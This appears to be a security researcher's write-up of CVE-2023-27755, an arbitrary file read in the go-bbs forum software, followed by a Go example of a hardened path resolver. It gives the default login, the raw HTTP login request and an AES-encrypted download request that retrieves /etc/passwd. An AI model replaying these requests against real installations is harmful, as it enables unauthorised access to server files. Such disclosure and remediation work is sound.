Successfully got a junk CVE ID: CVE-2023-27755

Installation

  1. Download: git clone https://github.com/gobbscom/go-bbs.git
  2. Create the config directory: cd go-bbs && mkdir conf
  3. Copy the example config: cp app.conf.example conf/app.conf
  4. Edit the database settings in the config
  5. Run ./go-bbs --install to set up the database
  6. Finally run ./go-bbs and open the configured port in a browser

Audit

Look at the route table in routers/router.go, line 196


Follow &home.SingleController{} into its Download method. The endpoint requires a logged-in user; a global search for Customer shows that a default user is created:

UserName: User
PassWord: 123456


Back in router.go, follow &home.LoginController{}; it takes username and password and logs the user in:

beego.Router("/login.html", &home.LoginController{}, "Post:Login")


POST /login.html HTTP/1.1
Host: 192.168.19.6:9090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

username=user&password=123456

This yields the session cookie: beegosessionID=***


The URL segment passed in is first run through AesDecrypt,


so the download path has to be put through AesEncrypt before it goes into the URL


GET /api/v1/download/1dClk+Blwbf5B9SEDK+l58R84WE7XKXawdq51GCypQo= HTTP/1.1
Host: 192.168.19.6:9090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Cookie: beegosessionID=6bf662559825c07495e9e8a1e7380180
Connection: close

Using the session cookie to call the download API, /etc/passwd is downloaded successfully

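The root cause the audit points at is that the decrypted URL segment is used directly as a filesystem path: AES-encrypting the parameter only obscures it, it does not limit which file the server opens. As an added Go example (not go-bbs's own code; the function names, the uploads directory and the sample paths are assumptions), here is that pattern next to a hardened resolver that confines every request to a download root:

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrOutsideBase is returned when the requested path would leave the download root.
var ErrOutsideBase = errors.New("requested path escapes the download directory")

// vulnerableResolve reproduces the pattern the audit describes (hypothetical,
// not go-bbs's own code): whatever AesDecrypt returns is used as the path to
// open, so a decrypted "/etc/passwd" is served verbatim.
func vulnerableResolve(decryptedPath string) string {
	return decryptedPath
}

// safeResolve confines the decrypted path to baseDir. It rejects empty and
// absolute paths, cleans "." and ".." components, joins the result onto
// baseDir and then checks that the joined path is still a descendant of it.
func safeResolve(baseDir, decryptedPath string) (string, error) {
	if decryptedPath == "" || filepath.IsAbs(decryptedPath) ||
		strings.HasPrefix(decryptedPath, "/") || strings.HasPrefix(decryptedPath, `\`) {
		return "", ErrOutsideBase
	}
	rel := filepath.Clean(filepath.FromSlash(decryptedPath))
	sep := string(filepath.Separator)
	if rel == ".." || strings.HasPrefix(rel, ".."+sep) {
		return "", ErrOutsideBase
	}
	base := filepath.Clean(baseDir)
	full := filepath.Join(base, rel)
	// Join already cleans, but re-check containment so a future change to the
	// logic above cannot silently widen what is served. The root itself
	// (rel == ".") is rejected too: a download endpoint serves files, not dirs.
	if !strings.HasPrefix(full, base+sep) {
		return "", ErrOutsideBase
	}
	return full, nil
}

func main() {
	// Constructed sample inputs standing in for the output of AesDecrypt.
	base := "/srv/go-bbs/uploads" // assumed download root
	inputs := []string{"docs/manual.pdf", "/etc/passwd", "../../etc/passwd", "docs/../../app.conf"}
	for _, p := range inputs {
		fmt.Printf("vulnerable: %q -> opens %q\n", p, vulnerableResolve(p))
		if full, err := safeResolve(base, p); err != nil {
			fmt.Printf("hardened:   %q -> rejected (%v)\n", p, err)
		} else {
			fmt.Printf("hardened:   %q -> opens %q\n", p, full)
		}
	}
}
```

If the download root can contain symlinks, run the result through filepath.EvalSymlinks and repeat the prefix check on the resolved path before opening it; the string check alone does not see where a link points. Rejecting the request at the resolver also gives a clean place to log the decrypted path, which is what a detection rule for traversal attempts against this endpoint would key on.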